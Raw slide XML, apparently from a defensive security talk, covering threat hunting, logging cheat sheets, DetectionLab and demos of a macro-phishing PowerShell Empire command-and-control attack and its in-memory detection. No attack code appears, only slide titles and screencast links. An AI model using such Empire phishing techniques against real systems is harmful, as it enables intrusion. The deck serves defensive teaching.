      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{344931A3-8D5B-4E47-BF30-F1C4BCAFD896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1974123"/>
            <a:ext cx="9144000" cy="2909754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="6468961"/>
            <a:ext cx="5547947" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Reference: https://www.us-cert.gov/ncas/alerts/AA18-284A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225192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https://www.malwarearchaeology.com/cheat-sheets/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>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t>How? Have no fear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cheat-sheets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are here!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7074127" y="6262089"/>
            <a:ext cx="1933845" cy="381053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1848754"/>
            <a:ext cx="9144000" cy="6096851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9035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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="9144000" cy="8534144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3219347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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C2C Empire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo, Visualize our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defensive coverage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{172FC8DB-BB4A-44CA-A0CD-D8E55500213B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1558624"/>
            <a:ext cx="9144001" cy="6315075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1933758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DB527B-F40C-4A2B-82FD-F9400B4A863E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C2C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from Excel Phish</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform in-Memory (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Empire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5F1080-2DE1-4255-8349-94728ACFB6EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217626" y="6130325"/>
            <a:ext cx="2638793" cy="590632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3751792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DB527B-F40C-4A2B-82FD-F9400B4A863E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect Empire in memory with PowerShell script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://screencast-o-matic.com/u/vqZ/Find_FilelessMal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empire &amp; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InjectedThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to detect</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform Memory (Empire) Attack &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5F1080-2DE1-4255-8349-94728ACFB6EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217626" y="6130325"/>
            <a:ext cx="2638793" cy="590632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297987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18FF4B-BBB7-44E5-93F7-2C529B07044F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659305" y="2333624"/>
            <a:ext cx="8197114" cy="4003345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Awareness of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> approaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> (Center for Internet Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benchmarks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Logging  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CheatSheets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> of what to look for) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> capabilities and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Measuring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> progress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Awareness of some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary Tactics/Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Empire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Attack scenario Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC9E3314-2182-414C-A6DD-B11361D72E44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5461DB0-4E0C-44C2-BB68-71D4F7636111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the Agenda?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134133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DA55B1-D14E-4B85-BBD8-FCC4864100C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659305" y="2320239"/>
            <a:ext cx="8197114" cy="2821777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Baseline (what is normal?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outliers (Frequency analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hunt behavior more than signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build out capabilities (identify/expose)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research… (understand attacks and build defense)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0588E858-93F9-4754-8018-9E87E31FA11C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8198491-65F0-477B-A18F-4BE139556696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1906AE61-0ABA-4BC2-9DF2-9B4EFB800E97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31941" y="5605153"/>
            <a:ext cx="9175941" cy="1252847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1444369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6DBA-C3CF-4278-B772-BAC94BEF2F7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766760" y="1639210"/>
            <a:ext cx="8184662" cy="411171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://github.com/clong/DetectionLab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A944208B-6518-435C-90B8-630A4477D61D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26D8AE9F-E5CA-4F7B-96A8-B31A88E0A333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3470879" y="-1"/>
            <a:ext cx="5574834" cy="6762997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2341653E-51CE-440E-87F7-BBCC7DD21DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38876" y="2136076"/>
            <a:ext cx="3470191" cy="4626921"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="953285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6DBA-C3CF-4278-B772-BAC94BEF2F7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
